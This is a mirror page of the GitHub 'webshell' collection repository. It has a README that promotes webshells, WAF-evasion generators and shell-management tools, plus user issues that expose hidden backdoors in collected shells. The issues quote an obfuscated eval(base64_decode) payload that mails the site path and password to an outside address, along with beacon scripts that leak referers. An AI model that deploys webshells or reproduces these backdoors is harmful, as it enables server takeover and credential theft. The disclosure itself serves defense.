Giter VIP home page Giter VIP logo

tennc / webshell Goto Github PK

View Code? Open in Web Editor NEW
9.8K 490.0 5.6K 99.59 MB

This is a webshell open source project

Home Page: http://tennc.github.io

License: MIT License

Perl 1.33% Python 0.29% Java 22.55% PHP 46.77% PowerShell 4.20% ColdFusion 0.11% C 0.01% Shell 0.03% CSS 0.01% HTML 4.07% Batchfile 0.01% C# 0.04% Roff 0.05% Hack 0.51% JavaScript 0.01% Ruby 0.01% VBScript 0.01% Classic ASP 15.31% ASP.NET 4.71%
webshell webshell-sniper php jsp asp aspx pl python jspx

webshell's Introduction

webshell | English | Türkiye

这是一个webshell收集项目

送人玫瑰,手有余香,如果各位下载了本项目,也请您能提交shell

本项目涵盖各种常用脚本

如:asp,aspx,php,jsp,pl,py

如提交各种webshell,请勿更改名称和密码

注意:所有shell 本人不保证是否有后门,但是自己上传的绝不会故意加后门

各位提交的,也请勿加后门

如发现存在后门代码,请issues 。

本项目提供的工具,禁止从事非法活动,此项目,仅供测试,所造成的一切后果,与本人无关。

在扩展一个项目

  1. webshell-venom
  2. 免杀webshell无限生成工具

免杀webshell无限生成工具(免杀一句话生成|免杀D盾|免杀安全狗护卫神河马查杀等一切waf)

Author : yzddmr6

https://github.com/pureqh/webshell

请自行鉴别后门

other webshell project (update 2021-04-03)

  1. xl7dev/WebShell
  2. JohnTroony/php-webshells
  3. BlackArch/webshells
  4. LandGrey/webshell-detect-bypass
  5. JoyChou93/webshell
  6. bartblaze/PHP-backdoors
  7. WangYihang/Webshell-Sniper
  8. threedr3am/JSP-Webshells
  9. DeEpinGh0st/PHP-bypass-collection
  10. lcatro/PHP-WebShell-Bypass-WAF
  11. tanjiti/webshellSample
  12. webshellpub/awsome-webshell
  13. tdifg/WebShell
  14. malwares/WebShell
  15. lhlsec/webshell
  16. oneoneplus/webshell
  17. vnhacker1337/Webshell
  18. backlion/webshell
  19. twepl/wso wso for php8

顺便在推一波网站管理工具

  1. **菜刀
  2. Cknife
  3. Altman
  4. xise
  5. Weevely
  6. quasibot
  7. Webshell-Sniper
  8. 蚁剑 antSword
  9. 冰蝎 Behinder
  10. webacoo
  11. 哥斯拉 Godzilla
  12. PhpSploit
  13. 以上排名不分先后

Author :tennc

http://tennc.github.io/webshell

license : MIT

Download link

Check github releases. Latest:

https://github.com/tennc/webshell/releases

Many thanks to Jetbrains for providing us with an OSS licence for their fine development tools such as Jetbrains tools.

Stargazers over time

webshell's People

Contributors

b2k1r avatar foulenzer avatar its0x08 avatar jrazer avatar kilida avatar krishpranav avatar medicean avatar nil0x42 avatar radarhere avatar robinvandenhurk avatar rubo77 avatar sartoshi-foot-dao avatar shellfeel avatar snmzmert avatar tennc avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

webshell's Issues

Add a security policy

Hey there!

I belong to an open source security research community, and a member (@rohit75033) has found an issue, but doesn’t know the best way to disclose it.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

Short tag are enable

In the code: eg: /etc/passwd<br><? ... use the short tag, not all servers support this. Change to <?php

Have a hiden native backdoor log

In the code <img src=\"http://emp3ror.com/images/emplogo1.gif\"> send the referer of path to emp3ror.com server. The administrator catch all referers into emp3ror.com server log. Dont be evil.

Other backdoor: <?php echo base64_decode('PFNDUklQVCBTUkM9JiN4NjgmI3g3NCYjeDc0JiN4NzAmI3gzYSYjeDJmJiN4MmYmI3g3NyYjeDc3JiN4NzcmI3gyZSYjeDZjJiN4NmYmI3g2MyYjeDYxJiN4NmMmI3g3MiYjeDZmJiN4NmYmI3g3NCYjeDJlJiN4NmUmI3g2NSYjeDc0JiN4MmYmI3g2OSYjeDYyJiN4NmUmI3g2NSYjeDZjJiN4NjUmI3g3MiYjeDJmJiN4NzkmI3g2MSYjeDdhJiN4MmUmI3g2YSYjeDczPjwvU0NSSVBUPiANCg==');?>

The render is: a=new/**/Image();a.src='http://localroot.net/ibneler/index.php?a='+escape(location.href);

This send the referer site to other persons.

This shell is dirty.

存在后门的一个

webshell/www-7jyewu-cn/DOC_ZIBSZXBIEG.php这个目录下的
1268行存在后门,注明一下,这个还是不错的一个shell.

/php/404.php.txt 存在后门

$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";  
eval(base64_decode($wsobuff)); 

解码过后

$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.6 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  **if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }**
}
else { $visitc++; }
@setcookie("visitz",$visitc);

Hidden Backdoor

in Line 75 you can see this code
$wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjYgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgib2t5YXp1QGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($wsobuff)); when i decode it i see mail() function to send (path ,password ,visitor ip) to this email [email protected] @mail("[email protected]",$judul,$body,$auth_pass);

webshell readme更新请求

谢谢提供webshell的收集。

我fork了你的webshell,但是我希望我的repo里面确定都是没有后门的shells。所以打算依次检查所有的文件。
我看到你的readme写到:“所有shell 本人不保证是否有后门,但是自己上传的绝不会故意加后门”
可否在你的readme中加上你自己确认没有病毒的shell的文件列表,这样我可以少检查很多shells :)

1

好歹给个密码

Submodule link is 404

The following submodule repo reports a 404 error:

[submodule "ysrc/webshell-sample"]
	path = ysrc/webshell-sample
	url = https://github.com/ysrc/webshell-sample

If the repo is no longer there, can this submodule be deleted?

php/ghost.php存在以下后门

php/ghost.php存在以下后门

<img width=1 height=1 src="http://websafe.facaiok.com/just7z/sx.asp?u=***.***.***.***/ghost.php&p=ghost"/>

webshell/php/非常规的pHp一句话木马.php

这个代码有问题呀,next 这个就会报错。Notice: Use of undefined constant next - assumed 'next' in
asx73ert 这个不是assert 应该也会报错吧。function 'asx73ert' not found or invalid function name in
我的测试环境是PHP5.6.8

Need mysql shell-client for JSP

Hi guys! First off, thanks for your page.
I'm looking mysql shell-client for jsp. (I just want browse tables,columns)
I've founded mysql client in one of your shell's but there i can do just simple sql commands, that doesn't enough for me. Any help?

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.